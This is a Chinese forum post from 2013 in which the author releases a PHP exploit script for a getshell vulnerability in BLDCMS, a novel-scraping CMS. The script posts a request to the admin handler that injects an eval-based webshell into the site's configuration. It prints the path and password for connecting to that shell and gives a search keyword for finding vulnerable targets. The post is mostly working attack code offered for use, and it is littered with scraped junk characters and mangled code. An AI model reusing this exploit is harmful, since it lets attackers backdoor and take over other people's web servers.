之前想搞一个黑阔站 发现旁站有一个站用了BLDCMS 我就下载看了.. 找到了一个getshell漏洞
4 ]" t3 P" x- [5 [ |4 Y! {$ e; r" I; a3 j7 u
" _) ~$ Y2 Z' |+ }1 w2 y |话说昨晚晴天小铸在90sec发现有人把这getshell漏洞的分析发出来了 擦 居然被人先发了 4 t. m+ m& M. F5 m& J3 K
4 A, u7 O. ?' p* u: K既然都有人发了 我就把我之前写好的EXP放出来吧/ x" S/ K( Z0 r' ]
% ]7 s* J1 ~8 s$ L, Tview source print?01.php;">& d. m$ Z$ E$ G
02.<!--?php. {# C. L/ Q% P
03.echo "-------------------------------------------------------------------
' `9 X# Q/ M7 D- X: B" O04.
5 {( Z* i& U8 D. H( A9 \* d05.------------\r\n BLDCMS(白老大php小说小偷) GETSHELL 0DAY EXP) Q. i2 g8 X p* j2 l! x4 Y
06.
0 g) x; k. |! g" U7 Y; E. A07.(GPC=Off)\r\n Vulnerability discovery&Code by 数据流@wooyun; X x" B6 O' S! [- a7 p9 ~
08.
$ v) O p! c: {6 X+ L9 G# X( I09.QQ:981009941\r\n 2013.3.21\r\n
5 S& e. v. h7 D& s1 F( @$ [+ V s10.
6 t. A3 A: b% c, s2 n11.
|$ f) W; J% F5 } e& \12.用法:php.exe EXP.php www.baidu.com /cms/ pass(一句话密码
) k) B% ?, ?* ~( p" r( p: C13. 4 V* [$ j4 ~4 m& C1 J! C1 N# B
14.)\r\n 搜索关键字:\"开发者: 白老大小说\"\r\n-----------
& w7 `( `9 ]/ p% @* J15.
. x/ ]/ w, A W: k1 R% O# @) ?) g16.--------------------------------------------------------------------\r\n";
) T% H" R' n3 b% q9 `; F& I6 g2 v17.$url=$argv[1];
! n6 u h+ I7 A) A18.$dir=$argv[2];7 [: N. t0 h4 I5 x0 e2 B9 c, j7 b! F
19.$pass=$argv[3];
$ M+ ]0 C% f0 ~7 a20.$eval='\';eval($_POST['.'"'.$pass.'"'.']);\'';4 S! y. N3 ^! _' c% l, I+ a3 v1 a
21.if (emptyempty($pass)||emptyempty($url))
, n4 e: d5 m0 [+ a. G) u1 N22.{exit("请输入参数");}$ h9 w m( a* v. d
23.else2 r6 c Z* P" w+ N, @
24.{
6 {7 b K( N G. h6 y$ Z: j25.$fuckdata='sitename=a&qq=1&getcontent=acurl&tongji=a&cmsmd5=1&sqlite='.$ev
! k+ Y7 ~2 a$ w, C7 q1 M5 R# J, l26.
! K$ j' `$ K' x8 g1 C27.al;
& H8 w( I- u: q: y8 F" F28.$length = strlen($fuckdata);2 |0 b3 B. z( {+ w7 c" v8 q1 B- ]9 W
29.function getshell($url,$pass)
3 b1 ~% b: E4 Y5 u/ n30.{7 S9 k, a3 {& F' ?! e- i
31.global $url,$dir,$pass,$eval,$length,$fuckdata;
- a+ R! v% `1 r& A- T, t9 F3 B32.$header = " OST /admin/chuli.php?action=a_1 HTTP/1.1\r\n";
9 p" E# L% w' j1 q1 w1 a: ]( _33.$header .= "Content-Type: application/x-www-form-urlencoded\r\n";
3 H$ A3 W& u1 O5 P7 a4 t, M/ o34.$header .= "User-Agent: MSIE\r\n";$ \6 Z% T% a1 [# F
35.$header .= "Host:".$url."\r\n";
9 F7 g" ], H0 |36.$header .= "Content-Length: ".$length."\r\n";! p3 \+ i; A, H- r/ C' g- p
37.$header .= "Connection: Close\r\n"; Y0 a- }6 _6 x6 Q" k! T, M
38.$header .="\r\n";& F' e* Y5 Y& [' e' _! c
39.$header .= $fuckdata."\r\n\r\n";
+ ]0 S0 n( B3 ?+ o" Z7 p* ~40.$fp = fsockopen($url, 80,$errno,$errstr,15);
; B7 [& |. M$ @* \) U7 v41.if (!$fp)5 v/ M) w- ?9 W3 L, X" P! }
42.{
# G; @/ v* |; j, ^43.exit ("利用失败:请检查指定目标是否能正常打开");
8 O! `9 u* d5 m: n9 i6 D44.}
! ^4 J5 w6 G/ Z0 N" K45.else{ if (!fputs($fp,$header))( ?$ o# `; j) y' e' P1 t# p
46.{exit ("利用失败");}0 q& I j# t3 Z+ Y }! s; e
47.else
' ]4 q5 v1 n1 ^8 ?4 V48.{
. L# I0 {2 a5 R. i" d49.$receive = '';
5 D1 O+ z1 G0 o6 u$ j$ N% T7 U50.while (!feof($fp)) {
0 _6 u, C! R6 s! u51.$receive .= @fgets($fp, 1000);. q5 Z- f3 j+ F! \) W
52.}* A$ p" ]: F9 g) H" [* k# U. b
53.@fclose($fp); W- ^. {" D3 l4 u0 i9 s! Q
54.echo "$url/$dir/conn/config/normal2.php pass pass(如连接失败 请检查目标- |3 Q- N! m* m! x, t8 F |
55. 8 M' g2 D3 l3 z* S7 }- S
56.GPC是否=off)";& }1 F0 F z% _/ |) P2 P2 V1 U
57.}}
) }+ t( M6 @) U! W' t58.}
8 X' R0 p3 N& W: q59.}# A" q" H, o- T! M" `* Y$ d7 O" S3 L
60.getshell($url,$pass);
' v5 h$ i7 z0 s/ J$ @. E61.?-->/ [) ?) ~$ m7 T( u- Z4 N/ v4 j" P
$ R, c6 R' k4 ]6 T
7 C9 O6 [9 ]$ e8 e d; t
* o$ z$ O+ N" J8 kby 数据流# F. V- I1 Z- B6 J( p* b; j, c: ]
|
发表于 2013-3-26 20:49:10
收藏
支持
反对